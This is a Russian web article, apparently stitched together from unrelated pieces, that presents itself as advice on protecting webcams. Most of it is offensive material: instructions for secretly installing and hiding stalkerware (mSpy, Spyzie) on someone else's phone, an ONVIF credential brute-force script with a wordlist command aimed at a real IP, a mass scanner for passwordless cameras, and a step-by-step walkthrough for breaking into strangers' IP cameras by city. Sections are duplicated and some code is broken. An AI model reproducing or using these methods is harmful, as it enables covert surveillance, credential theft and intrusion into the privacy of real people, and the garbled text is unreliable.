5 способов защиты веб-камеры от взлома и шпионажа: стоит ли заклеивать вебку и микрофон?

Содержание:

Используем приложение Spyzie

Это приложение было разработано преимущественно для того, чтобы вести наблюдение за своими детьми или другими людьми. Для использования программного обеспечения пользователю потребуется Нужно набрать название приложения в поисковой строке, а затем загрузить софт. Далее следовать по инструкции:

После заполнения каждого пункта, пользователь сможет зайти в свой профиль. Демо-версия будет доступна в течение недели, пользователь имеет возможность опробовать программное обеспечение. Зайдя в аккаунт, шпион может просмотреть звонки, сообщения, переписку в ватсапе и историю веб-обозревателя. Софт также предоставляет доступ к видео и изображениям.

Преимущества Недостатки
Есть возможность просматривать не только съемку, но и сообщения владельца телефона Прежде чем начать работу с приложением нужно зарегистрироваться на сайте. Могут возникнуть проблемы у пользователей, которые плохо понимают английский язык
Пользователь может наблюдать скрытно Потребуется предоставить информацию о целевом пользователе на сайте
Доступен просмотр вызовов и совершенных звонков на целевом телефоне Нужна верификация

Мигающий светодиод

Одним из распространенных признаков взлома веб-камеры является мигающий светодиодный индикатор рядом с ней, который указывает, что веб-камера работает. Вам нужно будет выяснить, что заставило веб-камеру включаться самостоятельно. Это могут быть приложения, установленные на вашем компьютере, или расширения, установленные в вашем браузере.

Один из способов проверить это — закрыть все ваши приложения одно за другим, включая ваш браузер и приложения, работающие в фоновом режиме. Если светодиодный индикатор гаснет после закрытия приложения, вы узнаете, кто является виновником.

Если светодиодный индикатор гаснет после закрытия браузера, это может быть расширение браузера, которое вызывает проблему. Проверьте свои расширения и отключите их один за другим, чтобы найти виновника.

На что способен RAT?

В галерее выше скрины программы DarkComet RAT. Это махровая классика жанра, самый известный инструмент для скрытого управления чужим компьютером, появился еще в 2008 году. Его имя иногда даже попадает в новости. Ходят слухи, что именно DarkComet использовался сирийскими властями для слежки за оппозицией.

Таблица в левой части экрана — список пользователей, компьютерами которых можно управлять. Справа список доступных действий для каждого. Как видите, компьютеры полностью в руках мошенников. Можно даже загружать файлы и запускать bat-скрипты. Отдельного внимания заслуживают разделы Spy Functions и Fun Functions.

«Шпионские функции» позволяют наблюдать за «рабом»: записывать звук и видео, делать что-то на рабочем столе (что-то вроде TeamViewer), записывать все нажатия клавиш. А «забавные функции» могут напугать жертву: отключить мышь/клавиатуру, выдвигать дисковод, отправлять сообщений в виде диалоговых окон или чата на экран компьютера. Уточню на всякий случай: когда работает RAT, на Windows огонек возле камеры в большинстве случаев не горит.

Используем программу MSPY

Это приложение является одним из лучших среди софтов-шпионов за пользователями. Его проще скачать не в маркете, а на официальном сайте, для этого потребуется ввести название в поисковой строке веб-обозревателя. Далее нужно следовать инструкции:

  1. Оказавшись на сайте разработчиков приложения, пользователю потребуется пройти 4 этапа регистрации. Вначале нужно ввести логин и пароль. Принять соглашение о пользовании, нажав галочку, а после подтвердить все операции. Нужно следовать подсказкам, и закончить регистрацию. Если нет возможности оформить тариф Премиум, и получить рут-права, то потребуется выбрать базовый пакет. Действия пользователя при этом будут ограничены, однако он все равно сможет отслеживать местоположение объекта, и получит доступ к его перепискам;
  2. Потребуется зайти в свою созданную учетную запись. Для того чтобы произвести слежку за целевым пользователем, потребуется иметь доступ к его телефону. Нужно незаметно установить MSPY, и активировать приложение. Загрузку софта следует также производить с сайта производителя. После этого нужно удалить или скрыть приложение, теперь подключение установлено. Пользователь может совершать различные действия с целевым телефоном с помощью своего аккаунта;
  3. При выполнении активации нужно выбрать на панели опцию «с джейлбрейк» или «без джейлбрейк». В первом случае пользователю будет представлен пошаговый алгоритм действий от разработчика. Нужно следовать подсказкам. При возникновении затруднений нужно воспользоваться . Выбрав опцию «без джейлбрейк», пользователь вводит логин и пароль для получения доступа к целевому телефону. Если владелец телефона, за которым предстоит установить слежку, имеет айфон, то нет нужды устанавливать приложение на его устройство. В случае с операционной системой Андроид это необходимая операция.
Преимущества Недостатки
Позволяет отслеживать не только данные с камеры, но и других приложений Для активации программы нужно обладать правами, взломать root
Есть возможность узнать пароли целевого пользователя, которые он набирает на своем телефоне Для пользования программным обеспечением нужно выбрать тариф и внести оплату. Можно обойтись базовым пакетом, однако возможности в нем будут сильно ограничены. За него тоже потребуется вносить плату
Мониторинг социальных сетей и происходящих в них изменений Потребуется установка приложения на телефон целевого пользователя

Основные методы DDoS-атак

Как правило, реализация идет по какому-либо из трех известных методов организации DDoS-атаки.

  1. По полосе пропускания — этот вид атаки подразумевает, что на веб-сайт направляется большое количество запросов по протоколам HTTP и, таким образом, полностью заполняет его пропускную способность, вызывая при этом отказ в обслуживании обычных посетителей данного интернет-ресурса.
  2. На основе протокола сервера — такой вид атаки направлен на конкретные сервисы сервера. Может выполняться с помощью интернет-протоколов. Часто такие атаки называют SYN-флуд, смысл которых в отсылке на веб-сервер большого количества SYN-запросов, на которые сервер должен ответить запросом ASK. Из-за большого количества таких запросов сервер часто не справляется с обработкой большого объема данных и «падает», т. е. выходит из строя.
  3. На основе ошибок конкретного веб-сайта — этот вид атаки является самым сложным в плане исполнения и применяется, как правило, высокопрофессиональными хакерами. Суть его состоит в том, что на сайте-жертве находятся уязвимости, используя которые создается высокая нагрузка на сервер и он получает отказ в обслуживании.

Как же хакеры организовывают такого рода атаки? Разберемся по шагам.

Брут-форс камер через ONVIF

Для некоторых хостов скрипт extractor.py будет выдавать примерно следующие ошибки:

zeep.exceptions.Fault: Sender not Authorized
During handling of the above exception, another exception occurred:
onvif.exceptions.ONVIFError: Unknown error: Sender not Authorized

Они означают, что пустые логин и пароль не подходят и нужно указать действительные учётные данные.

Используя это можно написать скрипты для брут-форса учётных данных IP камер. Преимущество этого метода по сравнению с Cameradar в том, что не нужно искать URI медиа потока.

Создадим файл bruteforcer.py и скопируем в него:

import sys
from onvif import ONVIFCamera

if len(sys.argv) < 4:
	user = ''
else:
	user = sys.argv

if len(sys.argv) < 5:
	password = ''
else:
	password = sys.argv 		

mycam = ONVIFCamera(sys.argv, sys.argv, user, password, '/usr/local/lib/python3.9/site-packages/wsdl/')

resp = mycam.devicemgmt.GetDeviceInformation()
print (str(resp))

На самом деле, это упрощённый вариант скрипта extractor.py — чтобы понять, что учётные данные неправильные, нам не нужно делать три запроса, достаточно одного.

Пример запуска:

python3 bruteforcer.py ХОСТ ПОРТ ПОЛЬЗОВАТЕЛЬ ПАРОЛЬ

Если к команде добавить «2>/dev/null», то мы не увидим ошибки — в случае успешной аутентификации будут выведены только данные об устройстве:

python3 bruteforcer.py ХОСТ ПОРТ ПОЛЬЗОВАТЕЛЬ ПАРОЛЬ 2>/dev/null

Пример брут-форса логина и пароля IP камеры с помощью Parallel:

parallel -j2 -a usernames.txt -a passwords.txt 'python3 bruteforcer.py 103.96.7.96 80 2>/dev/null {1} {2}'

Поиск камер без пароля в ONVIF

Чтобы автоматизировать процесс выявления камер у которых для управления по протоколу ONVIF не установлен пароль, я написал небольшой скрипт.

Файл checker.sh:

#!/bin/bash

line=$1

GetCapabilities=`cat <<_EOF_
    <s:Envelope
        xmlns:s="http://www.w3.org/2003/05/soap-envelope">
        <s:Body
            xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
            xmlns:xsd="http://www.w3.org/2001/XMLSchema">
            <GetCapabilities
                xmlns="http://www.onvif.org/ver10/device/wsdl">
                <Category>
                    All
                    </Category>
                </GetCapabilities>
            </s:Body>
        </s:Envelope>
_EOF_`

result=`timeout 5 curl -s $line:8899/onvif/device_service -d "$GetCapabilities" | grep -i -E 'GetCapabilitiesResponse' | xmllint --format - 2>/dev/null | grep -i -E -v 'parser error'`; 
result2=`timeout 5 curl -s $line:80/onvif/device_service -d "$GetCapabilities" | grep -i -E 'GetCapabilitiesResponse' | xmllint --format - 2>/dev/null | grep -i -E -v 'parser error'`; 
result3=`timeout 5 curl -s $line:8080/onvif/device_service -d "$GetCapabilities" | grep -i -E 'GetCapabilitiesResponse' | xmllint --format - 2>/dev/null | grep -i -E -v 'parser error'`; 
result4=`timeout 5 curl -s $line:5000/onvif/device_service -d "$GetCapabilities" | grep -i -E 'GetCapabilitiesResponse' | xmllint --format - 2>/dev/null | grep -i -E -v 'parser error'`; 
result5=`timeout 5 curl -s $line:6688/onvif/device_service -d "$GetCapabilities" | grep -i -E 'GetCapabilitiesResponse' | xmllint --format - 2>/dev/null | grep -i -E -v 'parser error'`; 

if ; then
	echo "Found: $line:8899";
	response=`python extractor.py $line 8899 2>/dev/null | sed -E "s/\/\/.+:/\/\/$line:/"`
	if ; then
		echo "$response" > results/$line.txt
	fi
fi

if ; then
	echo "Found: $line:80";
	response=`python extractor.py $line 80 2>/dev/null | sed -E "s/\/\/.+:/\/\/$line:/"`
	if ; then
		echo "$response" > results/$line.txt
	fi
fi

if ; then
	echo "Found: $line:8080";
	response=`python extractor.py $line 8080 2>/dev/null | sed -E "s/\/\/.+:/\/\/$line:/"`
	if ; then
		echo "$response" > results/$line.txt
	fi
fi
	
if ; then
	echo "Found: $line:5000";
	response=`python extractor.py $line 5000 2>/dev/null | sed -E "s/\/\/.+:/\/\/$line:/"`
	if ; then
		echo "$response" > results/$line.txt
	fi
fi

if ; then
	echo "Found: $line:6688";
	response=`python extractor.py $line 6688 2>/dev/null | sed -E "s/\/\/.+:/\/\/$line:/"`
	if ; then
		echo "$response" > results/$line.txt
	fi
fi

В той же папке где checker.sh также должен находится рассмотренный ранее файл extractor.py. Ещё создайте папку «results» для сохранения результатов.

Запускать так:

bash checker.sh IP_АДРЕС

Этот скрипт проверит пять портов на предмет того, запущена ли служба протокола ONVIF. Если служба будет найдена, то скрипт попытается получить информацию об устройстве с помощью extractor.py. Если это тоже завершится успехом, то полученные данные будут сохранены в папку «results».

Скрипт можно запускать для проверки одного хоста или для проверки множества в несколько потоков. Пример, в котором IP адреса берутся из файла hosts.txt и запускается проверка в 20 потоков:

parallel -j20 -a hosts.txt 'bash checker.sh {1}'

Связанная статья: Руководство по использованию GNU Parallel

Ещё один пример:

parallel -j200 'bash checker.sh 172.{3}.{1}.{2}' ::: {1..255} ::: {1..255} ::: {16..31}

Для поиска успешных результатов можно использовать команды:

cd results
cat * | grep -E -H -i 'Uri' *
cat * | grep -E -H 'HwAddress' *
cat * | grep -E -H 'Manufacturer' *

Эта команда составит список моделей:

cat * | grep 'Model' | sort | uniq

Даже умные лампочки небезопасны

Белые хакеры Колин О’Флинн и Иял Роунен показательно взломали популярные умные лампы Hue от Philips. Они нашли уязвимость в мосте Hue Bridge, через который управляются лампы, и контролировали их с расстояния до 200 м

Помигать чужими лампочками – что может быть лучше? Но это полбеды. Куда хуже, если хакеры будут перехватывать или подменять пакеты данных, которые внутри домашней сети рассылаются без защиты. 

В эксперименте Роунен и О’Флинн заставили лампы мигать на частоте более 60 Гц. Человеческий глаз такое не улавливает, но телескоп со специальным световым сенсором, установленный напротив окна – вполне. 

Внедрить в домашнюю систему вредонос через лампы тоже можно. Мост связывается с устройствами по закодированному беспроводному стандарту ZigBee. Хакеры уже давно выложили в интернет главный ключ от него. Так как устройства внутри сети не контролируют подпись переданных данных при обновлении прошивки, можно запустить поддельное обновление и вести DoS-атаки, например. 

Philips уже закрыл уязвимость и выпустил патч для ПО моста и мобильного приложения. Но кто знает, сколько еще дыр в софте этого и других производителей?

Кстати, взламывать умные устройства можно и с помощью дрона. Это уже попахивает промышленным шпионажем. 

Взлом iP камеры с помощью программ

Чтобы найти и подключится к онлайн камере необходим софт. Архив с необходимыми программами можете скачать с облака, здесь. В архиве содержаться 3 программы:

  1. KPortScan;
  2. RouterScan;
  3. iVMS-4200(v2.8.2.2_ML).

Сбор iP адресов камер

Для доступа к камере видеонаблюдения требуется iP адрес камеры, логин и пароль. Вот основные данные для того, чтобы iP камера отобразилась на мониторе.

Добыть нужные нам: адрес iP камеры, логин и пароль начинаем с поиска диапазонов. Переходим на сайт: https://4it.me/getlistip и вводим название города, в котором хотим найти все ай пи адреса камер видеонаблюдения. Жмём «Поиск», ниже кликаем по своему городу. Внизу будут диапазоны iP адресов которые нужно скопировать.

Выбираем город и жмём “Поиск”Кликаем ещё раз по названию городаНиже копируем все диапазоны ip адресов

Обработка iP адресов

Вставляем скопированные диапазоны. Ставим порт 8000. Выбираем Российскую Федерацию. Кликаем по кнопке: «Load ranges». Жмём на кнопку «Start».

Запускаем программу KPortScan и проводим такие манипуляции:

  1. Вставляем в окно программы скопированные диапазоны iP адресов камер;
  2. Порт выставляем 8000;
  3. В выпадающей вкладке выбираем Российскую Федерацию;
  4. Кликаем по кнопке: «Load ranges»;
  5. Запускаем операцию по очистки iP адресов камер кликая на кнопку: «Start».

Пойдёт процесс обработки. Проделанную работу можно наблюдать на полосе прогресса. По мере выполнения зелёная полоса будет расти вправо. Время, за которое выполняется очистка ай пи адресов примерно составляет минут 30 – 40.

Как только операция закончится, полоса прогресса станет пустой. Теперь закрываем программу KPortScan, так как она нам больше не понадобится.

Взлом iP адресов камер

Заходим в папку с программой KPortScan, открываем с помощью блокнота текстовый файл: «results», копируем все айпишники и закрываем блокнот. Пришло время к запуску второй программки для взлома iP адресов камер – RouterScan.

В интерфейсе программы RouterScan очищаем забитые адреса iP, для этого просто кликаем по кнопке: «Х» в пункте: «Enter IP ranges to scan». Следующим шагом нужно добавить наши обработанные iP адреса в программу. Кликаем по кнопке: «Е» всё в том же пункте Enter IP ranges to scan.

В открывшееся небольшое окно вставляем обработанные адреса, скопированные с текстового файла «result». Нажимаем на кнопку: «Start scan», тем самым запуская сканирование.

Завершится процесс, когда зелёная полоса внизу дойдёт до крайне правого положения.

Открываем в папке с программой KPortScan текстовый файл “result” с помощью блокнота и копируем готовые ip адреса. Закрываем блокнот.Запускаем из скачанного архива программу RouterScanОчищаем вбитые ip адресаВставляем скопированные, из файла “result”, ip адресаЗапускаем сканирование ip адресовПолоса прогресса программы RouterScan

IP камера – подключение и просмотр

Последняя программа из архива iVMS-4200(v2.8.2.2_ML) служит для просмотра веб камер. Далее следует установить её на компьютер и запустить.

После запуска перейти на вкладку «Панель управления» – «Управление устройством» – «Добавить». Теперь, чтобы iP камера работала, корректно заполняем:

  • Псевдоним – любое имя;
  • Адрес – IP адрес камеры;
  • Порт – оставляем без изменении: 8000;
  • Пользователь – логин от iP камеры
  • Пароль – пароль от iP камеры

Где брать адрес, логин и пароль смотрите на фотографии ниже. После, как вставили, кликаем по кнопочке: «Добавить». Переходим на вкладку «Панель управления» – «Основной ракурс».

Если всё сделали правильно, то взломанная iP камера отобразится в интерфейсе программы iVMS-4200. В случае, когда на экране ничего нет, попробуйте следующий адрес ip камеры из программы Router Scan.

Запускаем программу iVMS-4200(v2.8.2.2_ML). Кликаем: “Панель управления”. Выбираем: “Управление устройством”Кликаем по кнопке: “Добавить” для добавления взломанной ip камерыВ открывшемся окне прописываем адрес, логин и пароль, псевдоним пишем любойПосле заплнения всех необходимых данных кликаем: “Добавить”Для просмотра добавленной взломанной камеры переходим на вкладку: “Панель управления” и далее выбираем: “Основной ракурс”Камера взломана и подключена!

Закрывайте веб-камеру ноутбука, если не пользуетесь ею

Некоторые хакеры невероятно умны, и могут взломать защиту и включить вашу веб-камеру, но если что-то закрывает объектив, все эти усилия будут напрасными. В конце концов, даже лучшие хакеры не могут видеть сквозь скотч (если только у них нет рентгеновского зрения).

Если вы постоянно пользуетесь веб-камерой (например, для семейных звонков и удаленной работы), то можете приобрести специальную защитную шторку, которая закрывает камеру вашего ноутбука, что очень удобно.

Кому?

Если вы работаете за служебным компьютером, то за вами могут наблюдать сотрудники IT-отдела или начальство. Но защищаться от такой слежки не стоит, иначе о вас могут подумать: «Он что-то скрывает? Надо бы присмотреться к нему».

Сноуден и его единомышленники пропагандируют теорию о том, что популярные операционные системы время от времени делают фотографии пользователя и передают их на свои серверы. Но это часть глобальной системы слежения, от которой сложно спрятаться. Если вы простой порядочный человек, то вам нет нужды от нее защищаться.

Но есть люди, которые целенаправленно устанавливают программы для слежки и извлекают из этого выгоду. О них и поговорим.

Как защититься от взлома веб-камеры

Несмотря на все вышеупомянутые способы взломать вашу веб-камеру, есть также несколько мер предосторожности, которых стоит придерживаться, чтобы защитить свое устройство от хакерских атак

Пользуйтесь обычной камерой

Да, вы можете приобрести веб-камеру или целую систему видеонаблюдения, которая будет следить за домом в ваше отсутствие. Проблема, однако, заключается в том, что злоумышленник также может использовать сторонние программы, чтобы заглянуть в ваш дом.

Лучший способ защитить свое оборудование от хакеров – не переусердствовать, то есть приобрести обычную, но качественную веб-камеру. Не покупайте модель, которая предлагает возможность войти в систему из любой точки мира и получить доступ к отснятому материалу внутри вашего дома.

Сохраняйте свой компьютер в безопасности

Даже если вы не можете подключиться к веб-камере через Интернет, взломщики все еще способны использовать компьютер в качестве некого плацдарма для вредоносных программ.

Вот почему так важно загрузить надежный антивирус, постоянно обновлять его и время от времени проверять компьютер на наличие вирусов. Хороший антивирус обнаружит вторжения и защитит девайс от хакерской атаки

Подключайте или включайте веб-камеру только тогда, когда используете её

Если у вас USB веб-камера, то обязательно отключайте устройство, когда не используете его. Независимо от того, насколько хорош хакер, он не сможет просматривать вашу веб-камеру, если она не подключена физически.

Тем не менее стоит отметить, что если хакер уже получил доступ к ноутбуку, то он может без проблем указать ему включить веб-камеру.

Приложение AirDroid

Софт доступен для скачивания через маркет. Регистрация происходит через площадку ПО. Для того чтобы воспользоваться приложением, нужно следовать инструкции:

  1. Загрузить софт, дождаться установки. Далее нажать пальцем на ярлык, зайти в программное обеспечение. Потребуется ввести данные, которые позволят зарегистрировать новый аккаунт, и пользоваться приложением. При запуске трансляции нужно скопировать айпи-адрес и ввести его в строку браузера;
  2. После этого откроется сайт, с помощью которого пользователь проводит слежку. Пользователь может нажать на приложение «Проводник», передать какой-либо файл целевому человеку и наоборот. Это одно из главных преимуществ программы – она дает много возможностей своему владельцу.
Преимущества Недостатки
Приложение можно загрузить через Гугл Маркет Приложение совместимо только с операционной системой Андроид. Однако сейчас появляются новые версии софта, тестировать их придется на свой страх и риск
Можно воспользоваться онлайн-версией приложения и не скачивать софт на свое устройство Доступ предоставляется только к двум устройствам
Помимо камеры пользователь получит доступ к другой информации целевого абонента. Появится возможность не только просматривать файлы, но и скачивать их на свое устройство Для функционирования приложения потребуется вносить ежемесячную абонентскую плату

Часть 1: Можно ли взломать камеру смартфона, зная только номер телефона?

Прежде чем перейти к хакингу камеры телефона, ответим на один вопрос, который нам очень часто задают в последнее время: возможно ли «хакнуть» телефон, зная только используемый на нем номер?

Ответ — да. Однако некоторым кажется, что это слишком сложный процесс. К том уже, нужно взломать оригинальную прошивку смартфона, а это может сделать его уязвимым для хакерских атак и компьютерных вирусов.

У большинства обычных пользователей нет ни навыков, ни желания связываться со взломом прошивки смартфона. Если это можно сказать и о вас, то лучше используйте тот метод, о котором речь пойдет ниже.

Бонус: взломать могут даже случайно

Российская разработчица Анна Просветова нашла дыру в умных кормушках для животных Furrytail Pet Smart Feeder, которую продавали на платформе Xiaomi Youpin. Она изучала API системы и случайно поняла, как получить доступ ко всем таким кормушкам на планете.

И это реально опасно! Во-первых, дыра позволяет получить данные о Wi-Fi-сетях владельцев кормушек. И видеть, сколько в каждой кормушке еды.

Во-вторых, хакер может настроить расписание отдельной кормушки или запустить скрипт для всех кормушек сразу, чтобы как следует отсыпать еды всем собачкам и котикам. Или, наоборот, удалить расписание и лишить питомцев обеда. Так что некоторые коты и собаки могут не дождаться своих владельцев из долгих командировок…

Наконец, можно заставить кормушку скачать и установить прошивку-пустышку. После этого восстановить гаджет за 85 долларов можно будет только в заводских условиях. Гарантии на софт, как известно, нет нигде.

iPhones.ru

Ваша замечательная умная камера может быть взломана на раз.

Доступ через трояны

Если хакеры не могут использовать существующие точки входа в веб-камеру, они постараются создать новые. Это простейший метод, поскольку жертвы сами приходят к ним.

Нужно обманом заставить установить на компьютер троян, который выдаёт себя за обычное безвредное приложение. На самом деле он открывает злоумышленникам доступ к компьютеру. Троян может прийти через вложение в электронном письме, на веб-странице, через поддельные сообщения об обнаружении у вас на компьютере вирусов с предложением удалить их. Если согласиться, вирус на самом деле появится на компьютере.

Когда злоумышленник установил троян, он может поставить приложение для дистанционного доступа к компьютеру. После этого он может делать с ним что угодно незаметно для вас, в том числе просматривать веб-камеру.

Используем программу MSPY

Это приложение является одним из лучших среди софтов-шпионов за пользователями. Его проще скачать не в маркете, а на официальном сайте, для этого потребуется ввести название в поисковой строке веб-обозревателя. Далее нужно следовать инструкции:

  1. Оказавшись на сайте разработчиков приложения, пользователю потребуется пройти 4 этапа регистрации. Вначале нужно ввести логин и пароль. Принять соглашение о пользовании, нажав галочку, а после подтвердить все операции. Нужно следовать подсказкам, и закончить регистрацию. Если нет возможности оформить тариф Премиум, и получить рут-права, то потребуется выбрать базовый пакет. Действия пользователя при этом будут ограничены, однако он все равно сможет отслеживать местоположение объекта, и получит доступ к его перепискам;
  2. Потребуется зайти в свою созданную учетную запись. Для того чтобы произвести слежку за целевым пользователем, потребуется иметь доступ к его телефону. Нужно незаметно установить MSPY, и активировать приложение. Загрузку софта следует также производить с сайта производителя. После этого нужно удалить или скрыть приложение, теперь подключение установлено. Пользователь может совершать различные действия с целевым телефоном с помощью своего аккаунта;
  3. При выполнении активации нужно выбрать на панели опцию «с джейлбрейк» или «без джейлбрейк». В первом случае пользователю будет представлен пошаговый алгоритм действий от разработчика. Нужно следовать подсказкам. При возникновении затруднений нужно воспользоваться услугой «mAssistance». Выбрав опцию «без джейлбрейк», пользователь вводит логин и пароль для получения доступа к целевому телефону. Если владелец телефона, за которым предстоит установить слежку, имеет айфон, то нет нужды устанавливать приложение на его устройство. В случае с операционной системой Андроид это необходимая операция.
Преимущества Недостатки
Позволяет отслеживать не только данные с камеры, но и других приложений Для активации программы нужно обладать правами, взломать root
Есть возможность узнать пароли целевого пользователя, которые он набирает на своем телефоне Для пользования программным обеспечением нужно выбрать тариф и внести оплату. Можно обойтись базовым пакетом, однако возможности в нем будут сильно ограничены. За него тоже потребуется вносить плату
Мониторинг социальных сетей и происходящих в них изменений Потребуется установка приложения на телефон целевого пользователя

Домашние интернет-камеры – вообще находка для преступников

Большая часть моделей IP-камер настраивается очень просто: достаточно подключить гаджет к домашней сети, а затем зайти в браузере на определенный IP-адрес или установить на смартфон приложение производителя. 

Новые модели обычно используют зашифрованное https-соединение. Более старые и/или дешевые камеры обмениваются данными со смартфоном через облачный сервис. 

При этом камеры отправляют незашифрованные запросы в облако. Извлечь идентификатор сессии, с помощью которого шифруется трафик, несложно. Особенно если хакер подключился к тому же Wi-Fi. 

Куда опаснее другое: на многих камерах производитель устанавливает стандартный и/или неизменяемый пароль (root и т.д.). Зная IP, производителя и модель камеры, хакер может скачать ПО для нее с сайта производителя, найти этот пароль и получить полный доступ к гаджету. 

Но есть и относительно хорошая новость. Вашу IP-камеру взломают скорее, не чтобы шпионить за вами, а чтобы DDoS-ить популярные ресурсы или майнить криптовалюту. Хотя если ваша камера начнет внезапно вытворять что-то вроде показанного на видео, не удивляйтесь:

Разгадка простая: женщина купила китайскую б/у камеру, чтобы следить за своим щенком, пока она на работе. Доступ к видеопотоку камеры был прямо на сайте производителя. 

Еще один вариант – взлом через проброс портов. Часто пользователи открывают на роутере определенный порт, чтобы подключиться к домашней камере по интернету. Это открывает для хакеров окно возможностей. 

В том же списке – эксплойты для доступа к панели управления камер. Они позволяют, в частности, извлечь нешифрованное видео с накопителей устройств. 

Наконец, многие производители оставляют служебные входы к камерам. Они доступны через браузер. Например, у Foscam адрес имеет формат xxxxxx.myfoscam.org:88, в начале нужно подставить две буквы и четыре цифры. 

Зачем нужно DDoSить?

Киберпреступники, которые проводят DDoS-атаки, всегда ставят своей целью обрушить атакуемый сайт. При этом они используют ботнет-сеть, которая может объединять в своем составе сетевые серверы, настольные компьютеры и другие устройства, подключенные к интернету. Они всегда ищут для этого легкодоступные объекты, обычно настольные компьютеры, к которым им удастся получить доступ, и затем атакуют вас.В некоторых случаях атакующие используют комбинированные виды атаки для того, чтобы с высокой степенью вероятности преодолеть возможную защиту потенциальной жертвы.

Как защититься от кибератак? Несколько простых рекомендаций для обычных пользователей:

  1. Даже в случае таких низкоуровневых устройств, как IP-видеокамеры, всегда нужно менять заводские логины и пароли доступа, также менять стандартные порты доступа. Хотя у нас пока не известны случаи заражения вредоносными программами сети из умных холодильников, но за годы наблюдений попадались ботнеты на основе интернета вещей. .Камеры наблюдения — одни из самых популярных устройств и часто становятся средством атак.
  2. Конечно же, логины/пароли для разных ваших сервисов и устройств должны отличаться и не быть простейшими типа «12345» или «QWERTY».
  3. Настроить хотя бы штатные средства любого домашнего мар-шрутизатора, а именно фильтрацию внешних подключений по MAC адресу, тот же самый логин и пароль, чтобы ограничить доступ «из/вне» к вашей внутренней сети.
  4. Своевременно обновлять прошивки как сетевых устройств так и имеющегося у вас оборудования. Ведь при обнаружении уязвимостей производители, как правило, довольно оперативно реализуют новые прошивки с устраненной уязвимостью.

Как RAT попадает на компьютер жертвы?

Сначала RAT-ер создает файл с расширением exe, так называемый «стаб», в котором прописывает необходимые настройки. После этого ему надо сделать так, чтобы жертва запустила его на своем компьютере.

Первый путь — замаскировать файл под что-то полезное и убедить человека открыть его. Например, упомянутой выше сирийской оппозиции шпионы засылали DarkComet под видом «шифровальщика сообщений для Skype» и убеждали установить его для защиты от правительственной слежки.

RAT-программы распространяются как индивидуально: «парень передает однокласснице ГДЗ по химии в виде exe-файла» или массово: выкладка на торренты или файлобменники под видом полезных программ, спам в соцсетях, почте, форумах. BlackHole, например, распространялся под видом антивируса для Mac.

В тему: 4 типа мошеннических писем, на которые может повестись каждый

Второй путь — тупо пристроиться к чужому компьютеру с флешкой, пока его хозяин отошел. Жертвами RAT-еров часто становятся их близкие люди. В Tor сети можно наткнутся на сайты с зазывной надписью на главной «Прямая трансляция с фронтальной камеры моей 13-летней сестры Джози. Заплатите 0.01BTC ($10) и наблюдайте за ней круглосуточно».

Продавцы магазинов бытовой техники могут устанавливать программы для слежки на компьютеры покупателей.

Как взломать веб камеру — итоги

Важный момент в том, что файл прошивки, предоставленный производителем на сайте, общий для всех шести IP-камер серии N. И вероятнее всего, часть найденных уязвимостей присутствуют и в других устройствах Microdigital, которых, как говорилось в начале статьи, «свыше 150 моделей»!

Также стоит упомянуть, что на конференции Positive Hack Days 8 был конкурс на взлом IP-камер — CAMBreaker. Среди подопытных числилась и эта модель. Одним из призеров конкурса был Иван Анисеня, который, как оказалось, еще в прошлом году нашел уязвимость внедрения произвольных SQL-запросов и с ее помощью обошел авторизацию на этой камере.

Остается животрепещущий вопрос: как защитить периметр от злоумышленников, если в нем есть подобная камера? Для обеспечения безопасности нужно:

  • установить камеру в физически недоступном для злоумышленника месте;
  • внимательно изучить документацию;
  • отключить невостребованные сервисы, например FTP;
  • сменить все пароли и, желательно, имена пользователей устройства;
  • закрыть на стороне шлюза (чаще всего в роли шлюза выступает роутер) port-forwarding до IP-камеры.

Этим же списком рекомендаций можно руководствоваться при настройке любого другого умного устройства.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Adblock
detector